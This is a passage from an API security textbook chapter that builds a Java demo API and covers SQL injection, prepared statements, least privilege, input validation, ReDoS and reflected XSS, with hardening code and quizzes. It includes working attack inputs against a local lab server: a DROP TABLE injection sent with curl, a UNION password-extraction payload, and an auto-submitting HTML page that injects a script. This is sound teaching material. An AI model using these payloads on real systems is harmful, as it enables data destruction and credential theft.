that destroys that table completely. Figure 2.6 is a famous cartoon from the XKCD web
comic that illustrates the real-world problems that SQL injection can cause.

Figure 2.6 The consequences of failing to handle SQL injection attacks. (Credit: XKCD, “Exploits of a Mom,” https://www.xkcd.com/327/.)
2.4.1 Preventing injection attacks
There are a few techniques that you can use to prevent injection attacks. You could try
escaping any special characters in the input to prevent them having an effect. In this
case, for example, perhaps you could escape or remove the single-quote characters.
This approach is often ineffective because different databases treat different charac-
ters specially and use different approaches to escape them. Even worse, the set of spe-
cial characters can change from release to release, so what is safe at one point in time
might not be so safe after an upgrade.
A better approach is to strictly validate all inputs to ensure that they only contain
characters that you know to be safe. This is a good idea, but it’s not always possible to
eliminate all invalid characters. For example, when inserting names, you can’t avoid
single quotes, otherwise you might forbid genuine names such as Mary O’Neill.
The best approach is to ensure that user input is always clearly separated from
dynamic code by using APIs that support prepared statements. A prepared statement
allows you to write the command or query that you want to execute with placeholders
in it for user input, as shown in figure 2.7. You then separately pass the user input val-
ues and the database API ensures they are never treated as statements to be executed.
DEFINITION A prepared statement is a SQL statement with all user input replaced
with placeholders. When the statement is executed the input values are sup-
plied separately, ensuring the database can never be tricked into executing
user input as code.
Figure 2.7 A prepared statement ensures that user input values are always kept separate from the SQL statement itself. The SQL statement only contains placeholders (represented as question marks) and is parsed and compiled in this form. The actual parameter values are passed to the database separately, so it can never be confused into treating user input as SQL code to be executed.

Listing 2.6 shows the createSpace code updated to use a prepared statement. Dalesbred has built-in support for prepared statements by simply writing the statement with placeholder values and then including the user input as extra arguments to the updateUnique method call. Open the SpaceController.java file in your text editor and find the createSpace method. Update the code to match the code in listing 2.6, using a prepared statement rather than manually concatenating strings together. Save the file once you are happy with the new code.

Listing 2.6 Using prepared statements

public JSONObject createSpace(Request request, Response response)
        throws SQLException {
    var json = new JSONObject(request.body());
    var spaceName = json.getString("name");
    var owner = json.getString("owner");

    return database.withTransaction(tx -> {
        var spaceId = database.findUniqueLong(
            "SELECT NEXT VALUE FOR space_id_seq;");

        // Use placeholders in the SQL statement and pass the values
        // as additional arguments, so they can never be interpreted
        // as SQL code.
        database.updateUnique(
            "INSERT INTO spaces(space_id, name, owner) " +
            "VALUES(?, ?, ?);", spaceId, spaceName, owner);

        response.status(201);
        response.header("Location", "/spaces/" + spaceId);

        return new JSONObject()
            .put("name", spaceName)
            .put("uri", "/spaces/" + spaceId);
    });
}
Now when your statement is executed, the database will be sent the user input sepa-
rately from the query, making it impossible for user input to influence the commands
that get executed. Let’s see what happens when you run your malicious API call. This
time the space gets created correctly—albeit with a funny name!
$ curl -i -d "{\"name\": \"', ''); DROP TABLE spaces; --\",
➥ \"owner\": \"\"}" http://localhost:4567/spaces
HTTP/1.1 201 Created
Date: Wed, 30 Jan 2019 16:51:06 GMT
Location: /spaces/10
Content-Type: application/json
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"name":"', ''); DROP TABLE spaces; --","uri":"/spaces/10"}
Prepared statements in SQL eliminate the possibility of SQL injection attacks if used
consistently. They also can have a performance advantage because the database can
compile the query or statement once and then reuse the compiled code for many dif-
ferent inputs; there is no excuse not to use them. If you’re using an object-relational
mapper (ORM) or other abstraction layer over raw SQL commands, check the docu-
mentation to make sure that it’s using prepared statements under the hood. If you’re
using a non-SQL database, check to see whether the database API supports parameter-
ized calls that you can use to avoid building commands through string concatenation.
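For comparison, if you were talking to the database through plain JDBC rather than Dalesbred, the same parameterized insert would look something like the following sketch (the insertSpace helper is illustrative, not part of the Natter API):

import java.sql.Connection;
import java.sql.SQLException;

public class PreparedInsert {
    static void insertSpace(Connection conn, long spaceId,
            String spaceName, String owner) throws SQLException {
        try (var stmt = conn.prepareStatement(
                "INSERT INTO spaces(space_id, name, owner) VALUES(?, ?, ?)")) {
            // User input is bound to placeholders, never concatenated
            // into the SQL string.
            stmt.setLong(1, spaceId);
            stmt.setString(2, spaceName);
            stmt.setString(3, owner);
            stmt.executeUpdate();
        }
    }
}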
2.4.2 Mitigating SQL injection with permissions
While prepared statements should be your number one defense against SQL injection
attacks, another aspect of the attack worth mentioning is that the database user didn’t
need to have permissions to delete tables in the first place. This is not an operation
that you would ever require your API to be able to perform, so we should not have
granted it the ability to do so in the first place. In the H2 database you are using, and
in most databases, the user that creates a database schema inherits full permissions to
alter the tables and other objects in that database. The principle of least authority says
that you should only grant users and processes the fewest permissions that they need
to get their job done and no more. Your API does not ever need to drop database
tables, so you should not grant it the ability to do so. Changing the permissions will
not prevent SQL injection attacks, but it means that if an SQL injection attack is ever
found, then the consequences will be contained to only those actions you have explic-
itly allowed.
PRINCIPLE The principle of least authority (POLA), also known as the principle of
least privilege, says that all users and processes in a system should be given only
those permissions that they need to do their job—no more, and no less.
To reduce the permissions that your API runs with, you could try and remove permis-
sions that you do not need (using the SQL REVOKE command). This runs the risk that
you might accidentally forget to revoke some powerful permissions. A safer alternative
is to create a new user and only grant it exactly the permissions that it needs. To do
this, we can use the SQL standard CREATE USER and GRANT commands, as shown in list-
ing 2.7. Open the schema.sql file that you created earlier in your text editor and add
the commands shown in the listing to the bottom of the file. The listing first creates a
new database user and then grants it just the ability to perform SELECT and INSERT
statements on our two database tables.
Listing 2.7 Creating a restricted database user

-- Create the new database user.
CREATE USER natter_api_user PASSWORD 'password';
-- Grant just the permissions it needs.
GRANT SELECT, INSERT ON spaces, messages TO natter_api_user;
We then need to update our Main class to switch to using this restricted user after the
database schema has been loaded. Note that we cannot do this before the database
schema is loaded, otherwise we would not have enough permissions to create the data-
base! We can do this by simply reloading the JDBC DataSource object after we have
created the schema, switching to the new user in the process. Locate and open the
Main.java file in your editor again and navigate to the start of the main method where
you initialize the database. Change the few lines that create and initialize the database
to the following lines instead:
// Initialize the database schema as the privileged user.
var datasource = JdbcConnectionPool.create(
    "jdbc:h2:mem:natter", "natter", "password");
var database = Database.forDataSource(datasource);
createTables(database);

// Switch to the natter_api_user and recreate the database objects.
datasource = JdbcConnectionPool.create(
    "jdbc:h2:mem:natter", "natter_api_user", "password");
database = Database.forDataSource(datasource);
Here you create and initialize the database using the “natter” user as before, but you
then recreate the JDBC connection pool DataSource passing in the username and
password of your newly created user. In a real project, you should be using more
secure passwords than password, and you’ll see how to inject more secure connection
passwords in chapter 10.
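As a stopgap until then, you could at least avoid hard-coding the password in the source file. The sketch below reads it from an environment variable instead; the NATTER_DB_PASSWORD variable name is a made-up example, and it assumes the CREATE USER statement in schema.sql is updated to use the same secret.

// Read the database password from the environment rather than
// hard-coding it in the source code.
var dbPassword = System.getenv("NATTER_DB_PASSWORD");
if (dbPassword == null) {
    throw new IllegalStateException("NATTER_DB_PASSWORD is not set");
}
datasource = JdbcConnectionPool.create(
    "jdbc:h2:mem:natter", "natter_api_user", dbPassword);
database = Database.forDataSource(datasource);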
If you want to see the difference this makes, you can temporarily revert the
changes you made previously to use prepared statements. If you then try to carry out
the SQL injection attack as before, you will see a 500 error. But this time when you
check the logs, you will see that the attack was not successful because the DROP TABLE
command was denied due to insufficient permissions:
Caused by: org.h2.jdbc.JdbcSQLException: Not enough rights for object
"PUBLIC.SPACES"; SQL statement:
DROP TABLE spaces; --'); [90096-197]
Pop quiz

1 Which one of the following is not in the 2017 OWASP Top 10?
a) Injection
b) Broken Access Control
c) Security Misconfiguration
d) Cross-Site Scripting (XSS)
e) Cross-Site Request Forgery (CSRF)
f) Using Components with Known Vulnerabilities

2 Given the following insecure SQL query string:

String query =
    "SELECT msg_text FROM messages WHERE author = '"
    + author + "'"

and the following author input value supplied by an attacker:

john' UNION SELECT password FROM users; --

what will be the output of running the query (assuming that the users table exists with a password column)?
a) Nothing
b) A syntax error
c) John’s password
d) The passwords of all users
e) An integrity constraint error
f) The messages written by John
g) Any messages written by John and the passwords of all users

The answers are at the end of the chapter.

2.5 Input validation

Security flaws often occur when an attacker can submit inputs that violate your assumptions about how the code should operate. For example, you might assume that an input can never be more than a certain size. If you’re using a language like C or C++ that lacks memory safety, then failing to check this assumption can lead to a serious class of attacks known as buffer overflow attacks. Even in a memory-safe language, failing to check that the inputs to an API match the developer’s assumptions can result in unwanted behavior.
DEFINITION A buffer overflow or buffer overrun occurs when an attacker can supply input that exceeds the size of the memory region allocated to hold that
input. If the program, or the language runtime, fails to check this case then
the attacker may be able to overwrite adjacent memory.
A buffer overflow might seem harmless enough; it just corrupts some memory, so
maybe we get an invalid value in a variable, right? However, the memory that is over-
written may not always be simple data and, in some cases, that memory may be inter-
preted as code, resulting in a remote code execution vulnerability. Such vulnerabilities are
extremely serious, as the attacker can usually then run code in your process with the
full permissions of your legitimate code.
DEFINITION Remote code execution (RCE) occurs when an attacker can inject
code into a remotely running API and cause it to execute. This can allow the
attacker to perform actions that would not normally be allowed.
In the Natter API code, the input to the API call is presented as structured JSON. As
Java is a memory-safe language, you don’t need to worry too much about buffer over-
flow attacks. You’re also using a well-tested and mature JSON library to parse the
input, which eliminates a lot of problems that can occur. You should always use well-
established formats and libraries for processing all input to your API where possible.
JSON is much better than the complex XML formats it replaced, but there are still
often significant differences in how different libraries parse the same JSON.
LEARN MORE Input parsing is a very common source of security vulnerabilities,
and many widely used input formats are poorly specified, resulting in differ-
ences in how they are parsed by different libraries. The LANGSEC movement
(http://langsec.org) argues for the use of simple and unambiguous input for-
mats and automatically generated parsers to avoid these issues.
Insecure deserialization

Although Java is a memory-safe language and so less prone to buffer overflow attacks, that does not mean it is immune from RCE attacks. Some serialization libraries that convert arbitrary Java objects to and from string or binary formats have turned out to be vulnerable to RCE attacks, known as an insecure deserialization vulnerability in the OWASP Top 10. This affects Java’s built-in Serializable framework, but also parsers for supposedly safe formats like JSON have been vulnerable, such as the popular Jackson Databind.a The problem occurs because Java will execute code within the default constructor of any object being deserialized by these frameworks.

Some classes included with popular Java libraries perform dangerous operations in their constructors, including reading and writing files and performing other actions. Some classes can even be used to load and execute attacker-supplied bytecode directly. Attackers can exploit this behavior by sending a carefully crafted message that causes the vulnerable class to be loaded and executed.

The solution to these problems is to allowlist a known set of safe classes and refuse to deserialize any other class. Avoid frameworks that do not allow you to control which classes are deserialized. Consult the OWASP Deserialization Cheat Sheet for advice on avoiding insecure deserialization vulnerabilities in several programming languages: https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html. You should take extra care when using a complex input format such as XML, because there are several specific attacks against such formats. OWASP maintains cheat sheets for secure processing of XML and other attacks, which you can find linked from the deserialization cheat sheet.

a See https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/ for a description of the vulnerability. The vulnerability relies on a feature of Jackson that is disabled by default.
Although the API is using a safe JSON parser, it’s still trusting the input in other
regards. For example, it doesn’t check whether the supplied username is less than the
30-character maximum configured in the database schema. What happens when you pass in a longer username?
$ curl -d '{"name":"test", "owner":"a really long username
➥ that is more than 30 characters long"}'
➥ http://localhost:4567/spaces -i
HTTP/1.1 500 Server Error
Date: Fri, 01 Feb 2019 13:28:22 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"error":"internal server error"}
If you look in the server logs, you see that the database constraint caught the problem:
Value too long for column "OWNER VARCHAR(30) NOT NULL"
But you shouldn’t rely on the database to catch all errors. A database is a valuable asset
that your API should be protecting from invalid requests. Sending requests to the
database that contain basic errors just ties up resources that you would rather use pro-
cessing genuine requests. Furthermore, there may be additional constraints that are
harder to express in a database schema. For example, you might require that the user
exists in the corporate LDAP directory. In listing 2.8, you’ll add some basic input vali-
dation to ensure that usernames are at most 30 characters long, and space names up
to 255 characters. You’ll also ensure that usernames contain only alphanumeric char-
acters, using a regular expression.
PRINCIPLE Always define acceptable inputs rather than unacceptable ones when validating untrusted input. An allow list describes exactly which inputs are considered valid and rejects anything else.1 A blocklist (or deny list), on the other hand, tries to describe which inputs are invalid and accepts anything else. Blocklists can lead to security flaws if you fail to anticipate every possible malicious input. Where the range of inputs may be large and complex, such as Unicode text, consider listing general classes of acceptable inputs like “decimal digit” rather than individual input values.

1 You may hear the older terms whitelist and blacklist used for these concepts, but these words can have negative connotations and should be avoided. See https://www.ncsc.gov.uk/blog-post/terminology-its-not-black-and-white for a discussion.
Open the SpaceController.java file in your editor and find the createSpace method
again. After each variable is extracted from the input JSON, you will add some basic
validation. First, you’ll ensure that the spaceName is shorter than 255 characters, and
then you’ll validate the owner username matches the following regular expression:
[a-zA-Z][a-zA-Z0-9]{1,29}
That is, an uppercase or lowercase letter followed by between 1 and 29 letters or dig-
its. This is a safe basic alphabet for usernames, but you may need to be more flexible if
you need to support international usernames or email addresses as usernames.
Listing 2.8 Validating inputs

public String createSpace(Request request, Response response)
        throws SQLException {
    var json = new JSONObject(request.body());

    var spaceName = json.getString("name");
    // Check that the space name is not too long.
    if (spaceName.length() > 255) {
        throw new IllegalArgumentException("space name too long");
    }

    var owner = json.getString("owner");
    // Use a regular expression to ensure the username is valid.
    if (!owner.matches("[a-zA-Z][a-zA-Z0-9]{1,29}")) {
        throw new IllegalArgumentException("invalid username: " + owner);
    }
    ..
}
Regular expressions are a useful tool for input validation, because they can succinctly
express complex constraints on the input. In this case, the regular expression ensures
that the username consists only of alphanumeric characters, doesn’t start with a num-
ber, and is between 2 and 30 characters in length. Although powerful, regular expres-
sions can themselves be a source of attack. Some regular expression implementations
can be made to consume large amounts of CPU time when processing certain inputs,
leading to an attack known as a regular expression denial of service (ReDoS) attack (see sidebar).

ReDoS Attacks

A regular expression denial of service (or ReDoS) attack occurs when a regular expression can be forced to take a very long time to match a carefully chosen input string. This can happen if the regular expression implementation can be forced to back-track many times to consider different possible ways the expression might match.

As an example, the regular expression ^(a|aa)+$ can match a long string of a characters using a repetition of either of the two branches. Given the input string “aaaaaaaaaaaaab” it might first try matching a long sequence of single a characters, then when that fails (when it sees the b at the end) it will try matching a sequence of single a characters followed by a double-a (aa) sequence, then two double-a sequences, then three, and so on. After it has tried all those it might try interleaving single-a and double-a sequences, and so on. There are a lot of ways to match this input, and so the pattern matcher may take a very long time before it gives up. Some regular expression implementations are smart enough to avoid these problems, but many popular programming languages (including Java) are not.a Design your regular expressions so that there is always only a single way to match any input. In any repeated part of the pattern, each input string should only match one of the alternatives. If you’re not sure, prefer using simpler string operations instead.

a Java 11 appears to be less susceptible to these attacks than earlier versions.
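To illustrate the sidebar’s advice, the ambiguous pattern can be rewritten so that any input string matches in exactly one way (a standalone snippet, not part of the Natter API):

public class RegexExample {
    public static void main(String... args) {
        // Ambiguous: a run of 'a's can be split between the two
        // branches in many different ways, inviting backtracking.
        var ambiguous = "^(a|aa)+$";

        // Unambiguous: there is exactly one way to match any run of 'a's.
        var unambiguous = "^a+$";

        System.out.println("aaaa".matches(unambiguous)); // true
        System.out.println("aaab".matches(unambiguous)); // false
    }
}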
If you compile and run this new version of the API, you’ll find that you still get a 500
error, but at least you are not sending invalid requests to the database anymore. To
communicate a more descriptive error back to the user, you can install a Spark excep-
tion handler in your Main class, as shown in listing 2.9. Go back to the Main.java file in
your editor and navigate to the end of the main method. Spark exception handlers
are registered by calling the Spark.exception() method, which we have already stati-
cally imported. The method takes two arguments: the exception class to handle, and
then a handler function that will take the exception, the request, and the response
objects. The handler function can then use the response object to produce an appropri-
ate error message. In this case, you will catch IllegalArgumentException thrown by
our validation code, and JSONException thrown by the JSON parser when given incor-
rect input. In both cases, you can use a helper method to return a formatted 400 Bad
Request error to the user. You can also return a 404 Not Found result when a user tries
to access a space that doesn’t exist by catching Dalesbred’s EmptyResultException.
Listing 2.9 Handling exceptions

// Add the required imports.
import org.dalesbred.result.EmptyResultException;
import spark.*;

public class Main {

    public static void main(String... args) throws Exception {
        ..
        // Install exception handlers to signal invalid inputs to
        // the caller as HTTP 400 errors.
        exception(IllegalArgumentException.class,
            Main::badRequest);
        // Also handle exceptions from the JSON parser.
        exception(JSONException.class,
            Main::badRequest);
        // Return 404 Not Found for Dalesbred empty result exceptions.
        exception(EmptyResultException.class,
            (e, request, response) -> response.status(404));
    }

    private static void badRequest(Exception ex,
            Request request, Response response) {
        response.status(400);
        response.body("{\"error\": \"" + ex + "\"}");
    }
    ..
}
Now the user gets an appropriate error if they supply invalid input:
$ curl -d '{"name":"test", "owner":"a really long username
➥ that is more than 30 characters long"}'
➥ http://localhost:4567/spaces -i
HTTP/1.1 400 Bad Request
Date: Fri, 01 Feb 2019 15:21:16 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"error": "java.lang.IllegalArgumentException: invalid username: a really
long username that is more than 30 characters long"}
Pop quiz

3 Given the following code for processing binary data received from a user (as a java.nio.ByteBuffer):

    int msgLen = buf.getInt();
    byte[] msg = new byte[msgLen];
    buf.get(msg);

  and recalling from the start of section 2.5 that Java is a memory-safe language, what is the main vulnerability an attacker could exploit in this code?
  a Passing a negative message length
  b Passing a very large message length
  c Passing an invalid value for the message length
  d Passing a message length that is longer than the buffer size
  e Passing a message length that is shorter than the buffer size

The answer is at the end of the chapter.
2.6 Producing safe output
In addition to validating all inputs, an API should also take care to ensure that the out-
puts it produces are well-formed and cannot be abused. Unfortunately, the code
you’ve written so far does not take care of these details. Let’s have a look again at the
output you just produced:
HTTP/1.1 400 Bad Request
Date: Fri, 01 Feb 2019 15:21:16 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"error": "java.lang.IllegalArgumentException: invalid username: a really
long username that is more than 30 characters long"}
There are three separate problems with this output as it stands:

1 It includes details of the exact Java exception that was thrown. Although not a vulnerability by itself, these kinds of details in outputs help a potential attacker to learn what technologies are being used to power an API. The headers are also leaking the version of the Jetty webserver that is being used by Spark under the hood. With these details the attacker can try and find known vulnerabilities to exploit. Of course, if there are vulnerabilities then they may find them anyway, but you've made their job a lot easier by giving away these details. Default error pages often leak not just class names, but full stack traces and other debugging information.
2 It echoes back the erroneous input that the user supplied in the response and doesn't do a good job of escaping it. When the API client might be a web browser, this can result in a vulnerability known as reflected cross-site scripting (XSS). You'll see how an attacker can exploit this in section 2.6.1.
3 The Content-Type header in the response is set to text/html rather than the expected application/json. Combined with the previous issue, this increases the chance that an XSS attack could be pulled off against a web browser client.
You can fix the information leaks in point 1 by simply removing these fields from the
response. In Spark, it’s unfortunately rather difficult to remove the Server header com-
pletely, but you can set it to an empty string in a filter to remove the information leak:
afterAfter((request, response) ->
response.header("Server", ""));
You can remove the leak of the exception class details by changing the exception handler to return only the error message, not the full exception class. Change the badRequest method you added earlier to return just the detail message from the exception:

private static void badRequest(Exception ex,
        Request request, Response response) {
    response.status(400);
    response.body("{\"error\": \"" + ex.getMessage() + "\"}");
}
2.6.1 Exploiting XSS Attacks
Cross-Site Scripting
Cross-site scripting, or XSS, is a common vulnerability affecting web applications, in which an attacker can cause a script to execute in the context of another site. In a persistent XSS, the script is stored in data on the server and then executed whenever a user accesses that data through the web application. A reflected XSS occurs when a maliciously crafted input to a request causes the script to be included (reflected) in the response to that request. Reflected XSS is slightly harder to exploit because a victim has to be tricked into visiting a website under the attacker's control to trigger the attack. A third type of XSS, known as DOM-based XSS, attacks JavaScript code that dynamically creates HTML in the browser.
These can be devastating to the security of a web application, allowing an attacker to potentially steal session cookies and other credentials, and to read and alter data in that session. To appreciate why XSS is such a risk, you need to understand that the security model of web browsers is based on the same-origin policy (SOP). Scripts executing within the same origin (or same site) as a web page are, by default, able to read cookies set by that website, examine HTML elements created by that site, make network requests to that site, and so on, although scripts from other origins are blocked from doing those things. A successful XSS allows an attacker to execute their script as if it came from the target origin, so the malicious script gets to do all the same things that the genuine scripts from that origin can do. If I can successfully exploit an XSS vulnerability on facebook.com, for example, my script could potentially read and alter your Facebook posts or steal your private messages.
Although XSS is primarily a vulnerability in web applications, in the age of single-page apps (SPAs) it's common for web browser clients to talk directly to an API. For this reason, it's essential that an API take basic precautions to avoid producing output that might be interpreted as a script when processed by a web browser.

To understand the XSS attack, let's try to exploit it. Before you can do so, you may need to add a special header to your response to turn off built-in protections in some browsers that will detect and prevent reflected XSS attacks. This protection used to be widely implemented in browsers but has recently been removed from Chrome and Microsoft Edge.2 If you're using a browser that still implements it, this protection makes it harder to pull off this specific attack, so you'll disable it by adding the following header filter to your Main class (an afterAfter filter in Spark runs after all other filters, including exception handlers). Open the Main.java file in your editor and add the following lines to the end of the main method:

afterAfter((request, response) -> {
    response.header("X-XSS-Protection", "0");
});

2 See https://scotthelme.co.uk/edge-to-remove-xss-auditor/ for a discussion of the implications of Microsoft's announcement. Firefox never implemented the protections in the first place, so this protection will soon be gone from most major browsers. At the time of writing, Safari was the only browser I found that blocked the attack by default.
The X-XSS-Protection header is usually used to ensure browser protections are turned on, but in this case, you'll turn them off temporarily to allow the bug to be exploited.

NOTE The XSS protections in browsers have been found to cause security vulnerabilities of their own in some cases. The OWASP project now recommends always disabling the filter with the X-XSS-Protection: 0 header as shown previously.
With that done, you can create a malicious HTML file that exploits the bug. Open your text editor and create a file called xss.html and copy the contents of listing 2.10 into it. Save the file and double-click on it or otherwise open it in your web browser. The file includes an HTML form with the enctype attribute set to text/plain. This instructs the web browser to format the fields in the form as plain text field=value pairs, which you are exploiting to make the output look like valid JSON. You also include a small piece of JavaScript to auto-submit the form as soon as the page loads.

Listing 2.10
Exploiting a reflected XSS

<!DOCTYPE html>
<html>
<body>
  <!-- The form is configured to POST with Content-Type text/plain. -->
  <form id="test" action="http://localhost:4567/spaces"
      method="post" enctype="text/plain">
    <!-- You carefully craft the form input to be valid JSON with a
         script in the "owner" field. -->
    <input type="hidden" name='{"x":"'
        value='","name":"x","owner":"&lt;script&gt;alert(&#39;XSS!&#39;);&lt;/script&gt;"}' />
  </form>
  <!-- Once the page loads, you automatically submit the form
       using JavaScript. -->
  <script type="text/javascript">
    document.getElementById("test").submit();
  </script>
</body>
</html>
If all goes as expected, you should get a pop-up in your browser with the "XSS" message. So, what happened? The sequence of events is shown in figure 2.8, and is as follows:

1 When the form is submitted, the browser sends a POST request to http://localhost:4567/spaces with a Content-Type header of text/plain and the hidden form field as the value. When the browser submits the form, it takes each form element and submits them as name=value pairs. The &lt;, &gt;, and &#39; HTML entities are replaced with the literal values <, >, and ' respectively.
2 The name of your hidden input field is '{"x":"', although the value is your long malicious script. When the two are put together the API will see the following form input:

    {"x":"=","name":"x","owner":"<script>alert('XSS!');</script>"}

3 The API sees a valid JSON input and ignores the extra "x" field (which you only added to cleverly hide the equals sign that the browser inserted). But the API rejects the username as invalid, echoing it back in the response:

    {"error": "java.lang.IllegalArgumentException: invalid username:
      <script>alert('XSS!');</script>"}

4 Because your error response was served with the default Content-Type of text/html, the browser happily interprets the response as HTML and executes the script, resulting in the XSS popup.
Figure 2.8 A reflected cross-site scripting (XSS) attack against your API can occur when an attacker gets a web browser client to submit a form with carefully crafted input fields. When submitted, the form looks like valid JSON to the API, which parses it but then produces an error message. Because the response is incorrectly returned with a HTML content-type, the malicious script that the attacker provided is executed by the web browser client.
Developers sometimes assume that if they produce valid JSON output then XSS is not
a threat to a REST API. In this case, the API both consumed and produced valid JSON
and yet it was possible for an attacker to exploit an XSS vulnerability anyway.
2.6.2 Preventing XSS
So, how do you fix this? There are several steps that can be taken to avoid your API being used to launch XSS attacks against web browser clients:

- Be strict in what you accept. If your API consumes JSON input, then require that all requests include a Content-Type header set to application/json. This prevents the form submission tricks that you used in this example, as an HTML form cannot submit application/json content.
- Ensure all outputs are well-formed using a proper JSON library rather than by concatenating strings.
- Produce correct Content-Type headers on all your API's responses, and never assume the defaults are sensible. Check error responses in particular, as these are often configured to produce HTML by default.
- If you parse the Accept header to decide what kind of output to produce, never simply copy the value of that header into the response. Always explicitly specify the Content-Type that your API has produced.
Additionally, there are some standard security headers that you can add to all API responses to add additional protection for web browser clients (see table 2.1).

Table 2.1 Useful security headers

| Security header | Description | Comments |
|---|---|---|
| X-XSS-Protection | Tells the browser whether to block/ignore suspected XSS attacks. | The current guidance is to set to "0" on API responses to completely disable these protections due to security issues they can introduce. |
| X-Content-Type-Options | Set to nosniff to prevent the browser guessing the correct Content-Type. | Without this header, the browser may ignore your Content-Type header and guess (sniff) what the content really is. This can cause JSON output to be interpreted as HTML or JavaScript, so always add this header. |
| X-Frame-Options | Set to DENY to prevent your API responses being loaded in a frame or iframe. | In an attack known as drag 'n' drop clickjacking, the attacker loads a JSON response into a hidden iframe and tricks a user into dragging the data into a frame controlled by the attacker, potentially revealing sensitive information. This header prevents this attack in older browsers but has been replaced by Content Security Policy in newer browsers (see below). It is worth setting both headers for now. |
| Cache-Control and Expires | Controls whether browsers and proxies can cache content in the response and for how long. | These headers should always be set correctly to avoid sensitive data being retained in the browser or network caches. It can be useful to set default cache headers in a before() filter, to allow specific endpoints to override it if they have more specific caching requirements. The safest default is to disable caching completely using the no-store directive and then selectively re-enable caching for individual requests if necessary. The Pragma: no-cache header can be used to disable caching for older HTTP/1.0 caches. |
Modern web browsers also support the Content-Security-Policy header (CSP) that can be used to reduce the scope for XSS attacks by restricting where scripts can be loaded from and what they can do. CSP is a valuable defense against XSS in a web application. For a REST API, many of the CSP directives are not applicable, but it is worth including a minimal CSP header on your API responses so that if an attacker does manage to exploit an XSS vulnerability they are restricted in what they can do. Table 2.2 lists the directives I recommend for an HTTP API. The recommended header for an HTTP API response is:

Content-Security-Policy: default-src 'none';
➥ frame-ancestors 'none'; sandbox
Table 2.2 Recommended CSP directives for REST responses

| Directive | Value | Purpose |
|---|---|---|
| default-src | 'none' | Prevents the response from loading any scripts or resources. |
| frame-ancestors | 'none' | A replacement for X-Frame-Options, this prevents the response being loaded into an iframe. |
| sandbox | n/a | Disables scripts and other potentially dangerous content from being executed. |

2.6.3 Implementing the protections

You should now update the API to implement these protections. You'll add some filters that run before and after each request to enforce the recommended security settings.

First, add a before() filter that runs before each request and checks that any POST body submitted to the API has a correct Content-Type header of application/json. The Natter API only accepts input from POST requests, but if your API handles other request methods that may contain a body (such as PUT or PATCH requests), then you should also enforce this filter for those methods. If the content type is incorrect, then you should return a 415 Unsupported Media Type status, because this is the
standard status code for this case. You should also explicitly indicate the UTF-8 character-
encoding in the response, to avoid tricks for stealing JSON data by specifying a different
encoding such as UTF-16BE (see https://portswigger.net/blog/json-hijacking-for-the-
modern-web for details).
Secondly, you’ll add a filter that runs after all requests to add our recommended
security headers to the response. You’ll add this as a Spark afterAfter() filter, which
ensures that the headers will get added to error responses as well as normal responses.
Listing 2.11 shows your updated main method, incorporating these improve-
ments. Locate the Main.java file under natter-api/src/main/java/com/manning/
apisecurityinaction and open it in your editor. Add the filters to the main() method
below the code that you’ve already written.
Listing 2.11
Hardening your REST endpoints

public static void main(String... args) throws Exception {
    ..
    // Enforce a correct Content-Type on all methods that receive
    // input in the request body, returning a standard 415
    // Unsupported Media Type response for invalid Content-Types.
    before(((request, response) -> {
        if (request.requestMethod().equals("POST") &&
                !"application/json".equals(request.contentType())) {
            halt(415, new JSONObject().put(
                "error", "Only application/json supported"
            ).toString());
        }
    }));

    // Collect all your standard security headers into a filter
    // that runs after everything else.
    afterAfter((request, response) -> {
        response.type("application/json;charset=utf-8");
        response.header("X-Content-Type-Options", "nosniff");
        response.header("X-Frame-Options", "DENY");
        response.header("X-XSS-Protection", "0");
        response.header("Cache-Control", "no-store");
        response.header("Content-Security-Policy",
            "default-src 'none'; frame-ancestors 'none'; sandbox");
        response.header("Server", "");
    });

    // Use a proper JSON library for all outputs.
    internalServerError(new JSONObject()
        .put("error", "internal server error").toString());
    notFound(new JSONObject()
        .put("error", "not found").toString());

    exception(IllegalArgumentException.class, Main::badRequest);
    exception(JSONException.class, Main::badRequest);
}

private static void badRequest(Exception ex,
        Request request, Response response) {
    response.status(400);
    response.body(new JSONObject()
        .put("error", ex.getMessage()).toString());
}
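A quick way to check the Content-Type enforcement is to repeat a request that omits the JSON content type (curl sends application/x-www-form-urlencoded by default for -d). The exact headers in your output will vary, but based on the filters above you should see something along these lines:

$ curl -i -d '{"name":"test","owner":"demo"}' http://localhost:4567/spaces
HTTP/1.1 415 Unsupported Media Type
Content-Type: application/json;charset=utf-8

{"error":"Only application/json supported"}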
You should also alter your exceptions to not echo back malformed user input in any
case. Although the security headers should prevent any bad effects, it’s best practice
not to include user input in error responses just to be sure. It’s easy for a security
header to be accidentally removed, so you should avoid the issue in the first place by
returning a more generic error message:
if (!owner.matches("[a-zA-Z][a-zA-Z0-9]{0,29}")) {
throw new IllegalArgumentException("invalid username");
}
If you must include user input in error messages, then consider sanitizing it first using
a robust library such as the OWASP HTML Sanitizer (https://github.com/OWASP/
java-html-sanitizer) or JSON Sanitizer. This will remove a wide variety of potential XSS
attack vectors.
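For illustration only (this snippet is not from the book), a policy built with the OWASP HTML Sanitizer that allows no elements can strip markup from untrusted text before you embed it in a message; treat the exact calls shown as an assumption to verify against the library's documentation:

import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

// An empty policy permits no HTML elements, so markup in the
// untrusted input is removed before it is echoed anywhere.
PolicyFactory stripAll = new HtmlPolicyBuilder().toFactory();
String safe = stripAll.sanitize(untrustedInput);  // untrustedInput is hypothetical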
Answers to pop quiz questions

1 e. Cross-Site Request Forgery (CSRF) was in the Top 10 for many years but has declined in importance due to improved defenses in web frameworks. CSRF attacks and defenses are covered in chapter 4.
2 g. Messages from John and all users' passwords will be returned from the query. This is known as an SQL injection UNION attack and shows that an attacker is not limited to retrieving data from the tables involved in the original query but can also query other tables in the database.
Pop quiz

4 Which security header should be used to prevent web browsers from ignoring the Content-Type header on a response?
  a Cache-Control
  b Content-Security-Policy
  c X-Frame-Options: deny
  d X-Content-Type-Options: nosniff
  e X-XSS-Protection: 1; mode=block
5 Suppose that your API can produce output in either JSON or XML format, according to the Accept header sent by the client. Which of the following should you not do? (There may be more than one correct answer.)
  a Set the X-Content-Type-Options header.
